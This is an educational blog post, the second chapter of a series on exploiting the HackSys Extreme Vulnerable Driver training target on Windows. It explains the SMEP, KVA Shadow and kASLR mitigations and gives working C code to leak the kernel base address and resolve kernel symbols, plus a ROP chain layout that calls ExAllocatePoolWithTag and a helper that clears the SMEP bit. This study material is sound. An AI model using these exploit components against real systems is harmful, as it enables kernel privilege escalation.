[Cracking Windows Kernel with HEVD] Chapter 2: Is there a way to bypass kASLR, SMEP and KVA Shadow?
Cracking HackSys Extreme Vulnerable Driver: Is there a way to bypass kASLR, SMEP and KVA Shadow?
Where to redirect the execution flow?
In the previous post, we wrote a program that would crash our driver and leave us with a BSOD. We managed to discover the return address offset and redirect the program flow to an arbitrary address. But we were left with a question: what now? Where to redirect the execution flow?
The first naive approach that comes to mind is to create a userland function in our exploit and redirect the control flow to that function. This approach worked until Windows 8 (Windows 7, including SP1, does not use this mitigation). From that point onwards, Supervisor Mode Execution Prevention (SMEP) is enabled on processors that support it.
WTF is Supervisor Mode Execution Prevention?
Ok, but first what is supervisor mode anyways?
Supervisor mode is an execution mode which enables all instructions, including privileged ones. It gives access to different address spaces, memory management hardware and other peripherals. This is the mode in which the kernel, and its drivers, run. It is basically a “god mode” in which the kernel runs, but not userland programs.
Supervisor Mode Execution Prevention is therefore a mitigation that stops the CPU from executing code located in user-mode pages while it is running in supervisor mode. In terms of our exploit, if we redirect the execution flow to our program in userland, the CPU will raise a fault and we will immediately get a BSOD.
This mitigation can be disabled (almost trivially on Windows, if I might say so) by clearing bit 20 of the CR4 register (counting from zero). Writing to CR4 is a privileged operation, so it has to happen in kernel land, which we can achieve with a ROP chain.
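To make the bit arithmetic concrete, here is a minimal sketch of how the new CR4 value could be computed before a ROP chain loads it. The helper names `clear_bit` and `cr4_without_smep` are made up for illustration, and any CR4 value fed to them is an assumption: the real one has to be read from the target machine (for instance, in a kernel debugger).

```c
#include <assert.h>
#include <stdint.h>

#define CR4_SMEP_BIT 20u /* SMEP is bit 20 of CR4, counting from zero (mask 0x100000) */

/* Hypothetical helper: returns `value` with the given bit cleared. */
static uint64_t clear_bit(uint64_t value, unsigned bit) {
    assert(bit < 64);
    return value & ~(1ULL << bit);
}

/* Hypothetical helper: the CR4 value with SMEP disabled and every other bit untouched. */
static uint64_t cr4_without_smep(uint64_t cr4) {
    return clear_bit(cr4, CR4_SMEP_BIT);
}
```

For example, a CR4 value of 0x1506f8 (an illustrative value only) would become 0x506f8, and that is the constant a gadget sequence would have to move into CR4.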
We can also bypass SMEP by never going to userland in the first place. We can use ROP gadgets in the kernel to perform elevation of privileges or write our shellcode to a memory region in the kernel which is both executable and writable. This approach is usually harder than the former.
In this case, we should go with the easier approach and ROP our way to disable the SMEP bit on the CR4 register, right?
Well, we could try. But nowadays there is another mitigation in place that will make this bypass useless.
SMEP was our only hope. No, there is another.
There is another mitigation called Kernel Page-Table Isolation (KPTI), or, as Windows calls it, Kernel Virtual Address (KVA) Shadow. It was actually created to mitigate the Meltdown vulnerability by isolating kernel page tables from user page tables. However, it also creates another problem for us: while kernel code is executing, user pages are marked as non-executable (NX). This breaks our easy approach of just disabling SMEP with a ROP chain.
Now we can either mark user pages as executable again or use a writable and executable kernel page to store our shellcode. The latter approach will be used here.
With this approach, we don’t have to be concerned about SMEP at all, as we will just avoid it. But this raises yet another question: is there such a place in kernel where we can write our shellcode and execute it?
Allocating an executable pool
Driver developers can allocate different types of memory pools. The two most basic types are PagedPool and NonPagedPool. The former allocates non-executable pageable memory, whereas the latter allocates non-pageable memory which, by default, is executable. The allocation can be performed by calling the ExAllocatePoolWithTag() function with the desired parameters.
We shall use this function to allocate an executable NonPagedPool. Then we write our shellcode to this allocated region and execute it. Finally, we restore enough registers so the system can return to userland gracefully and that’s a wrap.
ExAllocatePoolWithTag() has the following prototype:
PVOID ExAllocatePoolWithTag(
[in] __drv_strictTypeMatch(__drv_typeExpr)POOL_TYPE PoolType,
[in] SIZE_T NumberOfBytes,
[in] ULONG Tag
);
The first parameter is the pool type, which is zero (NonPagedPool), as can be checked in the official Microsoft documentation. The second parameter is the size, for which we can simply use 4096 bytes. Finally, the Tag parameter is only used for debugging purposes, so we can put whatever we want in it.
It will return the address of the allocated pool.
According to Microsoft documentation, the calling convention dictates that the first parameter is passed in the rcx register, the second in rdx and the third in r8. We shall ROP our way to set rcx to zero and rdx to 4096, and then call this function. The address of the allocation will be returned in the rax register, as is also dictated by the calling convention.
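As a rough illustration of that register setup, the sketch below lays out the stack slots such a chain could occupy. Everything in it is an assumption made for illustration: the `alloc_gadgets` structure, the `build_alloc_chain` helper, and the existence of `pop rcx ; ret` and `pop rdx ; ret` gadgets at caller-supplied addresses. It also ignores stack alignment and where execution continues after the call, so treat it as a layout sketch rather than a working payload.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical gadget and function addresses, supplied by the caller. */
typedef struct {
    uint64_t pop_rcx_ret;               /* gadget: pop rcx ; ret */
    uint64_t pop_rdx_ret;               /* gadget: pop rdx ; ret */
    uint64_t ex_allocate_pool_with_tag; /* address of ExAllocatePoolWithTag */
} alloc_gadgets;

/* Writes the chain into `chain` and returns the number of 64-bit slots used. */
static size_t build_alloc_chain(uint64_t *chain, size_t capacity,
                                const alloc_gadgets *g) {
    size_t i = 0;
    assert(capacity >= 5);
    chain[i++] = g->pop_rcx_ret;
    chain[i++] = 0;    /* rcx = PoolType = NonPagedPool (0) */
    chain[i++] = g->pop_rdx_ret;
    chain[i++] = 4096; /* rdx = NumberOfBytes */
    /* r8 (Tag) is left as-is, since any tag value is acceptable. */
    chain[i++] = g->ex_allocate_pool_with_tag; /* returning here calls the function */
    return i;
}
```

The first slot of the chain would sit where the overwritten return address is, so that each `ret` pops the next entry.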
After the pool is allocated, we can use RtlCopyMemory to copy our shellcode from userland to the executable address in kernel land. Finally, we can use some gadget, such as jmp rax, to redirect the execution flow.
Once again, this approach raises another problem. We must have the addresses of ExAllocatePoolWithTag and RtlCopyMemory (or an analogous memory copy function) to know where to redirect our flow. We could get the addresses of these functions from ntoskrnl.exe (which is actually the kernel binary), but its imagebase changes on every reboot. This means that, after every reboot, every kernel function ends up at a different address (the randomized imagebase plus the function's fixed offset), making the addresses unpredictable. Our approach will rely on getting the offsets of the desired functions (and eventual gadgets) in the ntoskrnl.exe binary and somehow leaking the imagebase address to defeat the protection.
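The address arithmetic behind this idea can be sketched as follows. The `rebase` helper and its parameter names are hypothetical, and the numbers in the usage note are made-up placeholders rather than real kernel addresses.

```c
#include <assert.h>
#include <stdint.h>

/*
 * Hypothetical helper: given a symbol address and the base of the image it was
 * looked up in, compute where that symbol lives relative to a leaked base.
 */
static uint64_t rebase(uint64_t leaked_base, uint64_t symbol_addr,
                       uint64_t lookup_base) {
    assert(symbol_addr >= lookup_base);
    uint64_t offset = symbol_addr - lookup_base; /* fixed across reboots */
    return leaked_base + offset;                 /* changes with the imagebase */
}
```

For instance, a symbol found at 0x140001000 in an image based at 0x140000000 has offset 0x1000; with a leaked base of 0xfffff80000000000, it would be located at 0xfffff80000001000.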
Defeating the randomized imagebase
This sounds like a really hard problem, one that would rely on leaking a kernel address and then trying to guess the imagebase from it. And this problem is usually hard to solve. But Windows makes it easier for us!
For processes running with medium integrity level (which is the default level when you open applications), there are Windows APIs which will give that away for free. Microsoft even gives us an example of how to implement this.
The EnumDeviceDrivers function, declared in psapi.h, will enumerate all device drivers, including the kernel itself, and give us the base address of each one. It returns a list of device drivers, the first of which is the kernel itself. The implementation is very simple:
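#include <Windows.h>
#include <Psapi.h>
...
// Returns the kernel base address, or 0 if the enumeration fails
unsigned long long get_kernel_base_addr() {
    LPVOID drivers[1024];
    DWORD cbNeeded;
    // The first entry returned is the kernel image itself
    if (!EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) || cbNeeded < sizeof(drivers[0])) {
        return 0;
    }
    return (unsigned long long)drivers[0];
}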
There we go! The randomized imagebase is now defeated.
It is also useful to be able to get any kernel function address by the function name. This is done by opening the kernel binary as a library and looking up the address for the desired symbol. The implementation is very straightforward as well:
PVOID get_kernel_symbol_addr(const char *symbol) {
    PVOID kernelBaseAddr;
    HMODULE userKernelHandle;
    PCHAR functionAddress;
    unsigned long long offset;
    kernelBaseAddr = (PVOID)get_kernel_base_addr(); // Get base address from our previously implemented function
    if (kernelBaseAddr == NULL) {
        // Could not leak the kernel base address
        return NULL;
    }
    userKernelHandle = LoadLibraryA("C:\\Windows\\System32\\ntoskrnl.exe"); // Loads the kernel binary as a lib
    if (userKernelHandle == NULL) {
        // LoadLibraryA returns NULL (not INVALID_HANDLE_VALUE) on failure
        return NULL;
    }
    functionAddress = (PCHAR)GetProcAddress(userKernelHandle, symbol); // Finds the address of the specified symbol
    if (functionAddress == NULL) {
        // Symbol is not exported by the kernel binary
        FreeLibrary(userKernelHandle);
        return NULL;
    }
    offset = functionAddress - ((PCHAR)userKernelHandle); // Subtracts the base address of the lib loaded in the process memory from the address found for the symbol
    FreeLibrary(userKernelHandle); // The user-mode copy is no longer needed
    return (PVOID)(((PCHAR)kernelBaseAddr) + offset); // Adds the offset to the leaked kernel base address
}
With the function above, we can query the address of any kernel function. Neat!
I am afraid that is as far as we are going to get today, folks. In the next post we will craft our ROP payload. See you then!